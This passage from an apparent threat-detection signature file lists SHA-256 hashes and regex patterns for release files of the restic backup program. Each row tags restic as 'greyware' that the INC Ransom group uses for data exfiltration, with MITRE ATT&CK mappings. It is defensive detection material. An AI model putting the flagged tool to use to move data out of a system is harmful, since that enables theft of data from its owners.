TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*03eec0acc40aaf248498e956528de90b8f7efc854ae8a0d0ccf5ed7377bd4e71*",".{0,1000}03eec0acc40aaf248498e956528de90b8f7efc854ae8a0d0ccf5ed7377bd4e71.{0,1000}","greyware_tool_keyword","restic","backup program used 
by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*03f1fdbd7837c1934ce54d05f2ec947c62a45e93e68b7cf7d612310e095a1626*",".{0,1000}03f1fdbd7837c1934ce54d05f2ec947c62a45e93e68b7cf7d612310e095a1626.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0416febc1e9447269a9b414f0bbfe0172453fb5d03f0a756eca799060b1db6d5*",".{0,1000}0416febc1e9447269a9b414f0bbfe0172453fb5d03f0a756eca799060b1db6d5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0440615136eecfa56e9844e37679738622563c126c9cafb96433cec4ba11699a*",".{0,1000}0440615136eecfa56e9844e37679738622563c126c9cafb96433cec4ba11699a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0440b6c1c17b58563c729fa133896199406f29356329ca5d048e4d9dcbf7d6fe*",".{0,1000}0440b6c1c17b58563c729fa133896199406f29356329ca5d048e4d9dcbf7d6fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*054cb9f42c4aca898ef078ddb7b138517c6f9f80225f9c7204f6ee00b9b93134*",".{0,1000}054cb9f42c4aca898ef078ddb7b138517c6f9f80225f9c7204f6ee00b9b93134.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0550e9375d01e30924e8e551ddab23e2422afdb978348b73e51f912cff544633*",".{0,1000}0550e9375d01e30924e8e551ddab23e2422afdb978348b73e51f912cff544633.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*066ab67daf36067b99c2c0346d95f69372e5b38a0917396d2470713684e965f4*",".{0,1000}066ab67daf36067b99c2c0346d95f69372e5b38a0917396d2470713684e965f4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*067fbc0cf0eee4afdc361e12bd03b266e80e85a726647e53709854ec142dd94e*",".{0,1000}067fbc0cf0eee4afdc361e12bd03b266e80e85a726647e53709854ec142dd94e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*06bf3107ccb34b3c144d07ed52a0f39ae0f011d3af0cb951b2927ae2350c4631*",".{0,1000}06bf3107ccb34b3c144d07ed52a0f39ae0f011d3af0cb951b2927ae2350c4631.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*076a40a96cbd1931e456facffc9f1f3bc863a5b4f9e2eb95749952e8c03400af*",".{0,1000}076a40a96cbd1931e456facffc9f1f3bc863a5b4f9e2eb95749952e8c03400af.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*07cb932052b68c612875bca687f2a223359c2df6aaf6356710253fcda2b0fb5a*",".{0,1000}07cb932052b68c612875bca687f2a223359c2df6aaf6356710253fcda2b0fb5a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0820eee2fc73291dffd3794511099582b2b5dc0e5e112fea75100e64834f95f4*",".{0,1000}0820eee2fc73291dffd3794511099582b2b5dc0e5e112fea75100e64834f95f4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*084a42ddb25d1cdec5b607e7ef814c6feb7e644fe4d7648b28c590c705d1abf1*",".{0,1000}084a42ddb25d1cdec5b607e7ef814c6feb7e644fe4d7648b28c590c705d1abf1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*084e97e9ebab79b4fe01d48f70c81cfbdc45d811265f3987eb7c322be34e39d0*",".{0,1000}084e97e9ebab79b4fe01d48f70c81cfbdc45d811265f3987eb7c322be34e39d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*086848f2d4683ed2d581b584648d5c9c1bfe9ff61b85005c8a6477079f58b95d*",".{0,1000}086848f2d4683ed2d581b584648d5c9c1bfe9ff61b85005c8a6477079f58b95d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*08bb9b6592f50f08dcdd69a834028520f03e3186e530e69135f91ffc71d63e1a*",".{0,1000}08bb9b6592f50f08dcdd69a834028520f03e3186e530e69135f91ffc71d63e1a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*08cd75e56a67161e9b16885816f04b2bf1fb5b03bc0677b0ccf3812781c1a2ec*",".{0,1000}08cd75e56a67161e9b16885816f04b2bf1fb5b03bc0677b0ccf3812781c1a2ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*08eee3c5dfdc940f19deba942d5bd9a9e824cdfd1212db7eead5644f556f7a9e*",".{0,1000}08eee3c5dfdc940f19deba942d5bd9a9e824cdfd1212db7eead5644f556f7a9e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*08ef26797923f93bb5a395f7d4e4bf9bddab731f0c38c29cdd843848f7b3bc89*",".{0,1000}08ef26797923f93bb5a395f7d4e4bf9bddab731f0c38c29cdd843848f7b3bc89.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0900453b3118e8907fd19a1bb4b56d29c3f09b20d1eaccc773e888f80761d065*",".{0,1000}0900453b3118e8907fd19a1bb4b56d29c3f09b20d1eaccc773e888f80761d065.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*091518fa5ffd54b71b90eaefdf9d8d05fbf0da1b5585d39ec9e202bf9c448a47*",".{0,1000}091518fa5ffd54b71b90eaefdf9d8d05fbf0da1b5585d39ec9e202bf9c448a47.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*0915925d325e078508375c4ffbd4570c392c13640977a05e19db330a75ab510a*",".{0,1000}0915925d325e078508375c4ffbd4570c392c13640977a05e19db330a75ab510a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0a8ce786d48460aa1d4a75624c19262482df822fc36906461d602bb9451b2d3a*",".{0,1000}0a8ce786d48460aa1d4a75624c19262482df822fc36906461d602bb9451b2d3a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0ac18d8f1ea7306f3d76df0d034de4b2ae839027e88a86073f4745cfa181af2c*",".{0,1000}0ac18d8f1ea7306f3d76df0d034de4b2ae839027e88a86073f4745cfa181af2c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0af3ca934eb27efcb04923f478a90528eddc5ad8ffc4c0b183d83896383eaffe*",".{0,1000}0af3ca934eb27efcb04923f478a90528eddc5ad8ffc4c0b183d83896383eaffe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0b2bc7f3b6b1117924d30ce00aba145b572893f69289c1e8da24ab545ffc16eb*",".{0,1000}0b2bc7f3b6b1117924d30ce00aba145b572893f69289c1e8da24ab545ffc16eb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0b6ea556073812f430482992e60bffc80ca1134bd83b05a0575f577498833c86*",".{0,1000}0b6ea556073812f430482992e60bffc80ca1134bd83b05a0575f577498833c86.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0bcf557bb9fdac75b80c93f575ff2810e7c7c30b9fbf895f424c046d43c7cc68*",".{0,1000}0bcf557bb9fdac75b80c93f575ff2810e7c7c30b9fbf895f424c046d43c7cc68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0bec24bf1d313b22de9c879bf3803256f945be419f23db4e58fdb73c3f15ec31*",".{0,1000}0bec24bf1d313b22de9c879bf3803256f945be419f23db4e58fdb73c3f15ec31.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0c19de7f525b4f40bf35347c9834564e48cdfdf1b64972d0aef9e548d29960dd*",".{0,1000}0c19de7f525b4f40bf35347c9834564e48cdfdf1b64972d0aef9e548d29960dd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0c209fa7735b7a129d52fe5defb41289d878233480d2660803045811ba40a62f*",".{0,1000}0c209fa7735b7a129d52fe5defb41289d878233480d2660803045811ba40a62f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0cf697c88404b180d6d6ff2e7d2c27b2fcb9536da6dbdf15ad4d320af7e8f17c*",".{0,1000}0cf697c88404b180d6d6ff2e7d2c27b2fcb9536da6dbdf15ad4d320af7e8f17c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0e0f4b20b92d63623bd0abfc7a233a26a66834efb8a36d67c9dd14fdd973822d*",".{0,1000}0e0f4b20b92d63623bd0abfc7a233a26a66834efb8a36d67c9dd14fdd973822d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0e8ddd8fb30e6bddc6204052e06957a39a85536f5cb89e1c813d9eff3d3977cf*",".{0,1000}0e8ddd8fb30e6bddc6204052e06957a39a85536f5cb89e1c813d9eff3d3977cf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*0e95898310ad782ee54b42098c6b43b7c3e3b58a44e7f841d6533e441f011164*",".{0,1000}0e95898310ad782ee54b42098c6b43b7c3e3b58a44e7f841d6533e441f011164.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0ebaf56b7fe452a53e760b44bfa69331bb6b03dda5b538b69a5b8642e12a8b41*",".{0,1000}0ebaf56b7fe452a53e760b44bfa69331bb6b03dda5b538b69a5b8642e12a8b41.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*0fc75aed0d84a67a75a937e4543fe2c324dc2e4422ea8d0431ec63ac15cbde16*",".{0,1000}0fc75aed0d84a67a75a937e4543fe2c324dc2e4422ea8d0431ec63ac15cbde16.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*10b3f5491e54c82b421980e848542f8f589ad6635f83fb2d89d9996cb37ac9c7*",".{0,1000}10b3f5491e54c82b421980e848542f8f589ad6635f83fb2d89d9996cb37ac9c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*11b9976846f11e0d163abe45ab025ef7b26ce86a94dda613bfd8e4b51eb63bb6*",".{0,1000}11b9976846f11e0d163abe45ab025ef7b26ce86a94dda613bfd8e4b51eb63bb6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*11d6ee35ec73058dae73d31d9cd17fe79661090abeb034ec6e13e3c69a4e7088*",".{0,1000}11d6ee35ec73058dae73d31d9cd17fe79661090abeb034ec6e13e3c69a4e7088.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*120dca6c0da5706f7868b653f74eedac4e218b3d155a1963d66302d9eb363511*",".{0,1000}120dca6c0da5706f7868b653f74eedac4e218b3d155a1963d66302d9eb363511.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1219aed961e396fb1be1c2a86218cc72de87bcc4461f22f9d87cd1fccf7fc30c*",".{0,1000}1219aed961e396fb1be1c2a86218cc72de87bcc4461f22f9d87cd1fccf7fc30c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*124438413ba085530b9a0ec928dbcec411a401e0127940bd8d439072e054e2d2*",".{0,1000}124438413ba085530b9a0ec928dbcec411a401e0127940bd8d439072e054e2d2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*12d51bd60e658ef48f066fb5c872382fe0ad60a7665985e25895651c78019d2d*",".{0,1000}12d51bd60e658ef48f066fb5c872382fe0ad60a7665985e25895651c78019d2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1386e1efbcc9585fdc22c8a1f453b7da8b0f97b1a0e339cef1d26753bc368096*",".{0,1000}1386e1efbcc9585fdc22c8a1f453b7da8b0f97b1a0e339cef1d26753bc368096.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*15229ecd98cf8496d02e8a4918a27099d2e8202e559e5d2e3e92b4cdc4bcc5ec*",".{0,1000}15229ecd98cf8496d02e8a4918a27099d2e8202e559e5d2e3e92b4cdc4bcc5ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*160fbd38f7e626afc5f99a239776423629bd4b1e6cb9891c7ecf1a08acae06a4*",".{0,1000}160fbd38f7e626afc5f99a239776423629bd4b1e6cb9891c7ecf1a08acae06a4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*1636a30b0c9e7c1a9411d30696df2a2a62666ae30f8cdf14a0f71d3715c897c0*",".{0,1000}1636a30b0c9e7c1a9411d30696df2a2a62666ae30f8cdf14a0f71d3715c897c0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1665a0292194daca49b91f61498f048d3099193c562c81f60eb311aabec54313*",".{0,1000}1665a0292194daca49b91f61498f048d3099193c562c81f60eb311aabec54313.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*16935a0807abc635a6ad76b85b95fe703beaf188e5d3f27404b9e699e87c4f07*",".{0,1000}16935a0807abc635a6ad76b85b95fe703beaf188e5d3f27404b9e699e87c4f07.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1719136d3545bf0539b4e9c323e90e2389749d7f1eee98803bae39fa318af4f5*",".{0,1000}1719136d3545bf0539b4e9c323e90e2389749d7f1eee98803bae39fa318af4f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1815747d94340ba15a0443856675aa23d778c743a9cb8478b0025a40ab5add68*",".{0,1000}1815747d94340ba15a0443856675aa23d778c743a9cb8478b0025a40ab5add68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1847da329255b121b83e0da08c255017c9fcf05bf0bc99fea3714430e5d383eb*",".{0,1000}1847da329255b121b83e0da08c255017c9fcf05bf0bc99fea3714430e5d383eb.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*18ac281a3d3d2df65755abadf75bbb551cf62d5613f5821ad0e08c9088978f93*",".{0,1000}18ac281a3d3d2df65755abadf75bbb551cf62d5613f5821ad0e08c9088978f93.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*18db38d87241a38cb3b44b1b2e320009fa5e129804a7970c71ea4399fc4dec27*",".{0,1000}18db38d87241a38cb3b44b1b2e320009fa5e129804a7970c71ea4399fc4dec27.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1930f4934eb50f2aca7341a4fd5cb7053c39a76fd38d185551d2b3a60283bfdf*",".{0,1000}1930f4934eb50f2aca7341a4fd5cb7053c39a76fd38d185551d2b3a60283bfdf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*193edf6cc11c84106a634bd990feda1d50c24bb99e405f1eff6bf74b965dcadd*",".{0,1000}193edf6cc11c84106a634bd990feda1d50c24bb99e405f1eff6bf74b965dcadd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*19b77a9c4b75bd82b5ed2b13f6119b5f5dd8fadbec880b1c9897f25c3beb8a71*",".{0,1000}19b77a9c4b75bd82b5ed2b13f6119b5f5dd8fadbec880b1c9897f25c3beb8a71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*19cc16baa9f9a85123f627bc2ca7eff0f5d901a4674ea96b4ebb21df2183c8b5*",".{0,1000}19cc16baa9f9a85123f627bc2ca7eff0f5d901a4674ea96b4ebb21df2183c8b5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1a367846c52078e39113a1ff7d1d5615637a06c19a63215570e4d058c3faf329*",".{0,1000}1a367846c52078e39113a1ff7d1d5615637a06c19a63215570e4d058c3faf329.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*1a56d77d702056356afad246655a1974c5df127163542753f0fcede98a250045*",".{0,1000}1a56d77d702056356afad246655a1974c5df127163542753f0fcede98a250045.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1a5c1d2a3b17aa381c318b3f3919f7cfc4cd430c3a2c3053ba055fb4ccf38c97*",".{0,1000}1a5c1d2a3b17aa381c318b3f3919f7cfc4cd430c3a2c3053ba055fb4ccf38c97.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*1ad8a76a9f966da5f7a319c49a6db071a60ebaa24d69e6d86d53d6f2bcaf11ed*",".{0,1000}1ad8a76a9f966da5f7a319c49a6db071a60ebaa24d69e6d86d53d6f2bcaf11ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 